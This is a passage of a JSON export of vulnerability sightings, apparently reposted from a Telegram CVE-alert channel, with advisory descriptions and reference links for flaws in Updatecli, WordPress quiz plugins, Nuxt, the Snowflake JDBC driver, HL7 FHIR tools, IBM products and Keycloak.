CVE-2025-24355\n\ud83d\udd39 Description: Updatecli is a tool used to apply file update strategies. Prior to version 0.93.0, private maven repository credentials may be leaked in application logs in case of unsuccessful retrieval operation. During the execution of an updatecli pipeline which contains a `maven` source configured with basic auth credentials, the credentials are being leaked in the application execution logs in case of failure. Credentials are properly sanitized when the operation is successful but not when for whatever reason there is a failure in the maven repository, e.g. wrong coordinates provided, not existing artifact or version. Version 0.93.0 contains a patch for the issue.\n\ud83d\udccf Published: 2025-01-24T16:48:17.723Z\n\ud83d\udccf Modified: 2025-01-24T16:48:17.723Z\n\ud83d\udd17 References:\n1. https://github.com/updatecli/updatecli/security/advisories/GHSA-v34r-vj4r-38j6\n2. https://github.com/updatecli/updatecli/commit/344b28091ffeca5ed32e8d0f9eda542842fcd3fa", "creation_timestamp": "2025-01-24T17:04:50.000000Z"}, {"uuid": "7d744ae7-c4e3-456e-8799-2e1b0568d329", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WQ7F-4G58-W2C5", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3112", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-wq7f-4g58-w2c5\n\ud83d\udd25 CVSS Score: N/A (CVSS_V3)\n\ud83d\udd39 Description: The Quiz Maker Business, Developer, and Agency plugins for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018content\u2019 parameter in all versions up to, and including, 8.8.0 (Business), up to, and including, 21.8.0 (Developer), and up to, and including, 31.8.0 (Agency) due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n\ud83d\udccf Published: 2025-01-26T06:30:48Z\n\ud83d\udccf Modified: 2025-01-26T06:30:48Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-10636\n2. https://ays-pro.com/changelog-for-quiz-maker-pro\n3. https://ays-pro.com/wordpress/quiz-maker\n4. https://www.wordfence.com/threat-intel/vulnerabilities/id/6e845eae-dae9-40bb-aca9-21afaa40576d?source=cve", "creation_timestamp": "2025-01-26T07:05:59.000000Z"}, {"uuid": "adde6b67-b13d-401e-8141-369032d4e4eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4482-3C55-4652", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3111", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-4482-3c55-4652\n\ud83d\udd25 CVSS Score: A:H (CVSS_V3)\n\ud83d\udd39 Description: Local privilege escalation due to incorrect assignment of privileges of temporary files in the update mechanism of G DATA Management Server. This vulnerability allows a local, unprivileged attacker to escalate privileges on affected installations by placing a crafted ZIP archive in a globally writable directory, which gets unpacked in the context of SYSTEM and results in arbitrary file write.\n\ud83d\udccf Published: 2025-01-25T18:30:34Z\n\ud83d\udccf Modified: 2025-01-25T18:30:34Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0542\n2. https://github.com/nullby73/security-advisories/tree/main/CVE-2025-0542", "creation_timestamp": "2025-01-25T19:05:52.000000Z"}, {"uuid": "7de29176-3190-4765-9c72-1a10c11a7c92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2452-6XJ8-JH47", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3043", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24360\n\ud83d\udd39 Description: Nuxt is an open-source web development framework for Vue.js. Starting in version 3.8.1 and prior to version 3.15.3, Nuxt allows any websites to send any requests to the development server and read the response due to default CORS settings. Users with the default server.cors option using Vite builder may get the source code stolen by malicious websites. Version 3.15.3 fixes the vulnerability.\n\ud83d\udccf Published: 2025-01-25T00:49:09.783Z\n\ud83d\udccf Modified: 2025-01-25T00:49:09.783Z\n\ud83d\udd17 References:\n1. https://github.com/nuxt/nuxt/security/advisories/GHSA-2452-6xj8-jh47\n2. https://github.com/vitejs/vite/security/advisories/GHSA-vg6x-rcgg-rjx6\n3. https://github.com/nuxt/nuxt/pull/23995\n4. https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f\n5. https://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/client.ts#L257-L263\n6. https://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/vite-node.ts#L39", "creation_timestamp": "2025-01-25T01:05:10.000000Z"}, {"uuid": "9600374f-9982-4e55-a255-562023b2f535", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VG6X-RCGG-RJX6", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3043", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24360\n\ud83d\udd39 Description: Nuxt is an open-source web development framework for Vue.js. Starting in version 3.8.1 and prior to version 3.15.3, Nuxt allows any websites to send any requests to the development server and read the response due to default CORS settings. Users with the default server.cors option using Vite builder may get the source code stolen by malicious websites. Version 3.15.3 fixes the vulnerability.\n\ud83d\udccf Published: 2025-01-25T00:49:09.783Z\n\ud83d\udccf Modified: 2025-01-25T00:49:09.783Z\n\ud83d\udd17 References:\n1. https://github.com/nuxt/nuxt/security/advisories/GHSA-2452-6xj8-jh47\n2. https://github.com/vitejs/vite/security/advisories/GHSA-vg6x-rcgg-rjx6\n3. https://github.com/nuxt/nuxt/pull/23995\n4. https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f\n5. https://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/client.ts#L257-L263\n6. https://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/vite-node.ts#L39", "creation_timestamp": "2025-01-25T01:05:10.000000Z"}, {"uuid": "bce05f9c-b63c-473e-9f3e-5d071ee61e76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F39M-G6QQ-H3XV", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3174", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-f39m-g6qq-h3xv\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The WP Customer Area WordPress plugin through 8.2.4 does not have CSRF check in place when deleting its logs, which could allow attackers to make a logged in to delete them via a CSRF attack\n\ud83d\udccf Published: 2025-01-27T06:30:24Z\n\ud83d\udccf Modified: 2025-01-27T06:30:24Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-12280\n2. https://wpscan.com/vulnerability/2b32c0b8-28bb-4220-800b-4c369bca91c5", "creation_timestamp": "2025-01-27T07:08:07.000000Z"}, {"uuid": "6b6fe4f9-eddf-49e0-a292-ee4830b5329b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8X94-HMJH-97HQ", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12881", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-45442\n\ud83d\udd25 CVSS Score: 8.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Sinatra is a domain-specific language for creating web applications in Ruby. An issue was discovered in Sinatra 2.0 before 2.2.3 and 3.0 before 3.0.4. An application is vulnerable to a reflected file download (RFD) attack that sets the Content-Disposition header of a response when the filename is derived from user-supplied input. Version 2.2.3 and 3.0.4 contain patches for this issue.\n\ud83d\udccf Published: 2022-11-28T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-22T15:59:32.565Z\n\ud83d\udd17 References:\n1. https://github.com/sinatra/sinatra/security/advisories/GHSA-2x8x-jmrp-phxw\n2. https://github.com/sinatra/sinatra/commit/ea8fc9495a350f7551b39e3025bfcd06f49f363b\n3. https://github.com/advisories/GHSA-8x94-hmjh-97hq\n4. https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf\n5. https://lists.debian.org/debian-lts-announce/2023/01/msg00005.html", "creation_timestamp": "2025-04-22T16:03:22.000000Z"}, {"uuid": "1b688ac4-5a98-4306-b17c-3b2d3d3c9b99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7RQC-FF8M-7J23", "type": "seen", "source": "Telegram/3f3-cwfXIykKmhboQeDZ-9JfvsVfmMtyX9y0DYWKgM6OqHA", "content": "", "creation_timestamp": "2026-01-02T18:52:46.000000Z"}, {"uuid": "7c950dc1-7af9-4f80-9c44-a2c4f2a02d6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-46MV-5CPJ-WJXV", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3110", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-46mv-5cpj-wjxv\n\ud83d\udd25 CVSS Score: A:N (CVSS_V3)\n\ud83d\udd39 Description: Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot).  Supported versions that are affected are Oracle Java SE: 8u431-perf, 11.0.25, 17.0.13, 21.0.5, 23.0.1; Oracle GraalVM for JDK: 17.0.13, 21.0.5, 23.0.1; Oracle GraalVM Enterprise Edition: 20.3.16 and  21.3.12. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition.  Successful attacks of this vulnerability can result in  unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as  unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 4.8 (Confidentiality and Integrity impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).\n\ud83d\udccf Published: 2025-01-21T21:30:55Z\n\ud83d\udccf Modified: 2025-01-25T18:30:34Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-21502\n2. https://security.netapp.com/advisory/ntap-20250124-0009\n3. https://www.oracle.com/security-alerts/cpujan2025.html\n4. http://www.openwall.com/lists/oss-security/2025/01/25/6", "creation_timestamp": "2025-01-25T19:05:51.000000Z"}, {"uuid": "70730261-0191-4744-975a-f0ecf4b50522", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-85QX-MFPJ-CVJ4", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3114", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-85qx-mfpj-cvj4\n\ud83d\udd25 CVSS Score: N/A (CVSS_V3)\n\ud83d\udd39 Description: The Quiz Maker Business, Developer, and Agency plugins for WordPress is vulnerable to SQL Injection via the \u2018id\u2019 parameter in all versions up to, and including, 8.8.0 (Business), up to, and including, 21.8.0 (Developer), and up to, and including, 31.8.0 (Agency) due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n\ud83d\udccf Published: 2025-01-26T06:30:48Z\n\ud83d\udccf Modified: 2025-01-26T06:30:48Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-10628\n2. https://ays-pro.com/changelog-for-quiz-maker-pro\n3. https://ays-pro.com/wordpress/quiz-maker\n4. https://www.wordfence.com/threat-intel/vulnerabilities/id/9bd873e5-fd65-48c3-a71d-aaf6d8372606?source=cve", "creation_timestamp": "2025-01-26T07:06:01.000000Z"}, {"uuid": "0bab7a44-e2e8-4388-9b01-22f065b5b90d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8V6P-C4W2-R9XW", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3113", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-8v6p-c4w2-r9xw\n\ud83d\udd25 CVSS Score: N/A (CVSS_V3)\n\ud83d\udd39 Description: The Quiz Maker Business, Developer, and Agency plugins for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 8.8.0 (Business), up to, and including, 21.8.0 (Developer), and up to, and including, 31.8.0 (Agency). This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.\n\ud83d\udccf Published: 2025-01-26T06:30:48Z\n\ud83d\udccf Modified: 2025-01-26T06:30:48Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-10633\n2. https://ays-pro.com/changelog-for-quiz-maker-pro\n3. https://ays-pro.com/wordpress/quiz-maker\n4. https://www.wordfence.com/threat-intel/vulnerabilities/id/eb81f83f-a0e7-46d9-b106-fe31f8ad3eb9?source=cve", "creation_timestamp": "2025-01-26T07:06:00.000000Z"}, {"uuid": "b4471d81-8ae2-4de3-aa07-4968da749f48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4GV5-8WW7-7MF6", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3117", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-4gv5-8ww7-7mf6\n\ud83d\udd25 CVSS Score: N/A (CVSS_V3)\n\ud83d\udd39 Description: The Quiz Maker Business, Developer, and Agency plugins for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ays_save_google_credentials' function in all versions up to, and including, 8.8.0 (Business), up to, and including, 21.8.0 (Developer), and up to, and including, 31.8.0 (Agency). This makes it possible for unauthenticated attackers to modify the Google Sheets integration credentials within the plugin's settings. Because the 'client_id' parameter is not sanitized or escaped when used in output, this vulnerability could also be leveraged to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\n\ud83d\udccf Published: 2025-01-26T06:30:48Z\n\ud83d\udccf Modified: 2025-01-26T06:30:48Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-10574\n2. https://ays-pro.com/changelog-for-quiz-maker-pro\n3. https://ays-pro.com/wordpress/quiz-maker\n4. https://www.wordfence.com/threat-intel/vulnerabilities/id/d8a4feb3-908f-4fff-84f2-099f56d46f5b?source=cve", "creation_timestamp": "2025-01-26T07:06:06.000000Z"}, {"uuid": "d2eed3df-682d-42ce-9ad5-9980f8af7572", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-84P5-CQQQ-H4GR", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3115", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-84p5-cqqq-h4gr\n\ud83d\udd25 CVSS Score: N/A (CVSS_V3)\n\ud83d\udd39 Description: xmlXIncludeAddNode in xinclude.c in libxml2 before 2.11.0 has a use-after-free.\n\ud83d\udccf Published: 2025-01-26T06:30:48Z\n\ud83d\udccf Modified: 2025-01-26T06:30:48Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2022-49043\n2. https://github.com/php/php-src/issues/17467\n3. https://gitlab.gnome.org/GNOME/libxml2/-/commit/5a19e21605398cef6a8b1452477a8705cb41562b", "creation_timestamp": "2025-01-26T07:06:01.000000Z"}, {"uuid": "356da07a-e8f3-44d9-94e8-0f42f45d2516", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FP6X-MQ75-X6GH", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-fp6x-mq75-x6gh\n\ud83d\udd25 CVSS Score: N/A (CVSS_V3)\n\ud83d\udd39 Description: The Survey Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018ays_sections[5][questions][8][title]\u2019 parameter in all versions up to, and including, 5.1.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.\n\ud83d\udccf Published: 2025-01-26T12:30:32Z\n\ud83d\udccf Modified: 2025-01-26T12:30:32Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13505\n2. https://plugins.trac.wordpress.org/browser/survey-maker/tags/5.1.3.2/admin/partials/surveys/actions/partials/survey-maker-surveys-actions-tab1.php#L1160\n3. https://www.wordfence.com/threat-intel/vulnerabilities/id/fc3c22a2-b766-419c-a481-48e6a73b084c?source=cve", "creation_timestamp": "2025-01-26T13:06:16.000000Z"}, {"uuid": "95cfec08-15cd-4a90-9a98-a16442fa3a5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2377-G2H8-5F9C", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3150", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-2377-g2h8-5f9c\n\ud83d\udd25 CVSS Score: 4.6 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability classified as critical was found in needyamin image_gallery 1.0. This vulnerability affects unknown code of the file /admin/gallery.php of the component Cover Image Handler. The manipulation of the argument image leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udccf Published: 2025-01-27T00:31:33Z\n\ud83d\udccf Modified: 2025-01-27T00:31:33Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0722\n2. https://vuldb.com/?ctiid.293482\n3. https://vuldb.com/?id.293482\n4. https://vuldb.com/?submit.482822\n5. https://www.websecurityinsights.my.id/2025/01/imagegallery-add-gallery.html", "creation_timestamp": "2025-01-27T01:06:54.000000Z"}, {"uuid": "c5313ae9-9519-4119-adc5-49fc72aae2bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6729-95V3-PJC2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2993", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24363\n\ud83d\udd39 Description: The HL7 FHIR IG publisher is a tool to take a set of inputs and create a standard FHIR IG. Prior to version 1.8.9, in CI contexts, the IG Publisher CLI uses git commands to determine the URL of the originating repo. If the repo was cloned, or otherwise set to use a repo that uses a username and credential based URL, the entire URL will be included in the built Implementation Guide, exposing username and credential. This does not impact users that clone public repos without credentials, such as those using the auto-ig-build continuous integration infrastructure. This problem has been patched in release 1.8.9. Some workarounds are available. Users should ensure the IG repo they are publishing does not have username or credentials included in the `origin` URL. Running the command `git remote origin url` should return a URL that contains no username, password, or token; or users should run the IG Publisher CLI with the `-repo` parameter and specify a URL that contains no username, password, or token.\n\ud83d\udccf Published: 2025-01-24T18:54:44.179Z\n\ud83d\udccf Modified: 2025-01-24T18:54:44.179Z\n\ud83d\udd17 References:\n1. https://github.com/HL7/fhir-ig-publisher/security/advisories/GHSA-6729-95v3-pjc2\n2. https://github.com/HL7/fhir-ig-publisher/commit/d968694b7dd041640efab5414d7077d5028569f7\n3. https://github.com/HL7/fhir-ig-publisher/releases/tag/1.8.9", "creation_timestamp": "2025-01-24T19:05:30.000000Z"}, {"uuid": "e7b48bf8-cbc5-42cd-aad8-4cd054c88fbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7HPQ-3G6W-PVHF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3381", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24789\n\ud83d\udd25 CVSS Score: 7.7 (CVSS_V3)\n\ud83d\udd39 Description: ### Issue\nSnowflake discovered and remediated a vulnerability in the Snowflake JDBC Driver. When the EXTERNALBROWSER authentication method is used on Windows, an attacker with write access to a directory in the %PATH% can escalate their privileges to the user that runs the vulnerable JDBC Driver version.\n\nThis vulnerability affects versions 3.2.3 through 3.21.0 on Windows. Snowflake fixed the issue in version 3.22.0.\n\n### Vulnerability Details\nWhen the EXTERNALBROWSER authentication method is selected, the Snowflake JDBC Driver on non-macOS operating systems tries to open the SSO URL using xdg-open. Because xdg-open is a Linux program that doesn\u2019t exist in a default Windows installation, a sufficiently privileged attacker could place a malicious executable in one of the directories on the %PATH% and achieve local privilege escalation to the user running the JDBC Driver.\n\n### Solution\nSnowflake released version 3.22.0 of the Snowflake JDBC Driver, which fixes this issue. We recommend users upgrade to version 3.22.0.\n\n### Additional Information\nIf you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our [Vulnerability Disclosure Policy](https://hackerone.com/snowflake?type=team).\n\ud83d\udccf Published: 2025-01-29T18:41:57Z\n\ud83d\udccf Modified: 2025-01-29T18:41:57Z\n\ud83d\udd17 References:\n1. https://github.com/snowflakedb/snowflake-jdbc/security/advisories/GHSA-7hpq-3g6w-pvhf\n2. https://nvd.nist.gov/vuln/detail/CVE-2025-24789\n3. https://github.com/snowflakedb/snowflake-jdbc/commit/4f01bb8f9b708c71e7a2111c87371dbfc1d53dd6\n4. https://github.com/snowflakedb/snowflake-jdbc", "creation_timestamp": "2025-01-29T19:11:17.000000Z"}, {"uuid": "66ddfed7-af68-4a0d-b155-41f99cdedcfe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93WW-43RR-79V3", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3504", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-93ww-43rr-79v3\n\ud83d\udd25 CVSS Score: 7.0 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability was found in Keycloak. Deployments of Keycloak with a reverse proxy not using pass-through termination of TLS, with mTLS enabled, are affected. This issue may allow an attacker on the local network to authenticate as any user or client that leverages mTLS as the authentication mechanism.\n\ud83d\udccf Published: 2024-11-25T19:40:46Z\n\ud83d\udccf Modified: 2025-01-30T17:47:40Z\n\ud83d\udd17 References:\n1. https://github.com/keycloak/keycloak/security/advisories/GHSA-93ww-43rr-79v3\n2. https://github.com/keycloak/keycloak/issues/35217\n3. https://github.com/keycloak/keycloak", "creation_timestamp": "2025-01-30T18:12:32.000000Z"}, {"uuid": "2abcd99e-66f9-4826-97c4-04b5152313cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VWPM-799J-8HXQ", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3093", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-vwpm-799j-8hxq\n\ud83d\udd25 CVSS Score: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N\n\ud83d\udd39 Description: IBM Control Center 6.2.1 and 6.3.1 \n\n\n\ncould allow an authenticated user to obtain sensitive information exposed through a directory listing.\n\ud83d\udccf Published: 2025-01-25T15:30:31Z\n\ud83d\udccf Modified: 2025-01-25T15:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-35113\n2. https://www.ibm.com/support/pages/node/7174796", "creation_timestamp": "2025-01-25T17:06:07.000000Z"}, {"uuid": "5b03ad42-6f19-4483-b729-589c17b26fb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QJP6-CP7G-V8XV", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3096", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-qjp6-cp7g-v8xv\n\ud83d\udd25 CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n\ud83d\udd39 Description: IBM Cloud Pak System 2.3.3.0, 2.3.3.3, 2.3.3.3 iFix1, 2.3.3.4, 2.3.3.5, 2.3.3.6, 2.3.3.6 iFix1, 2.3.3.6 iFix2, 2.3.3.7, and 2.3.3.7 iFix1\u00a0could disclose sensitive information about the system that could aid in further attacks against the system.\n\ud83d\udccf Published: 2025-01-25T15:30:31Z\n\ud83d\udccf Modified: 2025-01-25T15:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2023-38714\n2. https://www.ibm.com/support/pages/node/7159533", "creation_timestamp": "2025-01-25T17:06:09.000000Z"}, {"uuid": "6dde7c30-e3d2-411c-a76d-b1153175a823", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8C3X-HQ82-GJCM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3008", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52807\n\ud83d\udd39 Description: The HL7 FHIR IG publisher is a tool to take a set of inputs and create a standard FHIR IG. Prior to version 1.7.4, XSLT transforms performed by various components are vulnerable to XML external entity injections. A processed XML file with a malicious DTD tag `( ]&gt;` could produce XML containing data from the host system. This impacts use cases where org.hl7.fhir.publisher is being used to within a host where external clients can submit XML. A previous release provided an incomplete solution revealed by new testing. This issue has been patched as of version 1.7.4. No known workarounds are available.\n\ud83d\udccf Published: 2025-01-24T18:34:23.255Z\n\ud83d\udccf Modified: 2025-01-24T19:42:52.498Z\n\ud83d\udd17 References:\n1. https://github.com/HL7/fhir-ig-publisher/security/advisories/GHSA-8c3x-hq82-gjcm\n2. https://github.com/HL7/fhir-ig-publisher/compare/1.7.3...1.7.4", "creation_timestamp": "2025-01-24T20:04:51.000000Z"}, {"uuid": "fa845cbf-8a08-4968-8c98-fa0e038c3e96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PXFF-CV94-PM48", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3097", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-pxff-cv94-pm48\n\ud83d\udd25 CVSS Score: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n\ud83d\udd39 Description: IBM Analytics Content Hub 2.0 is vulnerable to a buffer overflow due to improper return length checking. A remote authenticated attacker could overflow a buffer and execute arbitrary code on the system or cause the server to crash.\n\ud83d\udccf Published: 2025-01-25T15:30:31Z\n\ud83d\udccf Modified: 2025-01-25T15:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-39750\n2. https://www.ibm.com/support/pages/node/7172787", "creation_timestamp": "2025-01-25T17:06:13.000000Z"}, {"uuid": "70c38be1-3ee4-4c6d-ac4c-4dde0baed2c5", "vulnerability_lookup_origin": 